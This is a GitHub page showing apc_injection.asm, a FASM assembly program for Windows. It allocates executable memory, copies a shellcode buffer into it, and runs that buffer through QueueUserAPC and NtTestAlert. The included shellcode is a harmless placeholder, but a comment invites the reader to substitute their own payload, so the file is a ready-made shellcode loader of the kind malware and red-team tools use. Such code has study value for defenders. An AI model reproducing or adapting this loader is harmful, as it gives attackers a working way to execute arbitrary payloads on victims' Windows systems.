-
Notifications
You must be signed in to change notification settings - Fork 5
/
apc_injection.asm
74 lines (59 loc) · 2.35 KB
/
apc_injection.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
format PE GUI 4.0
entry main
include 'win32w.inc'
section '.code' readable executable
; **************************************************
; * Code
main:
; VirtualAlloc()
xor eax, eax ; NULL
push PAGE_EXECUTE_READWRITE ; VirtualAlloc.flProtect
push MEM_COMMIT or MEM_RESERVE ; VirtualAlloc.flAllocationType
push [shellcode_length] ; VirtualAlloc.dwSize
push eax ; VirtualAlloc.lpAddress
call [VirtualAlloc]
test eax, eax
jz exit
; Copy Shellcode to Allocated Memory Region
mov edi, eax ; Destination
mov esi, shellcode ; Source
mov ecx, [shellcode_length] ; Count
rep movsb ; Copy
mov esi, eax ; eax eq destination
; GetCurrentThread()
call [GetCurrentThread]
mov ebx, eax
; QueueUserAPC()
xor eax, eax
push eax ; QueueUserAPC.dwData
push ebx ; QueueUserAPC.hThread (Current Thread)
push esi ; QueueUserAPC.pfnAPC (Copied Shellcode)
call [QueueUserAPC]
test eax, eax
jz exit
; NtTestAlert()
call [NtTestAlert]
exit:
; ExitProcess()
xor eax, eax
inc eax ; ExitCode = 1
push eax ; ExitProcess.uExitCode
call [ExitProcess]
; **************************************************
; * Data
section '.data' data readable
; Replace with your own shellcode
shellcode db 0xcc, 0x90, 0x90, 0x90, 0x90
shellcode_length dd $ - shellcode
; **************************************************
; * Imports
section '.idata' import data readable
library kernel32, 'KERNEL32.dll',\
ntdll, 'NTDLL.DLL'
import kernel32,\
ExitProcess, 'ExitProcess',\
GetCurrentThread, 'GetCurrentThread',\
QueueUserAPC, 'QueueUserAPC',\
VirtualAlloc, 'VirtualAlloc'
import ntdll,\
NtTestAlert, 'NtTestAlert'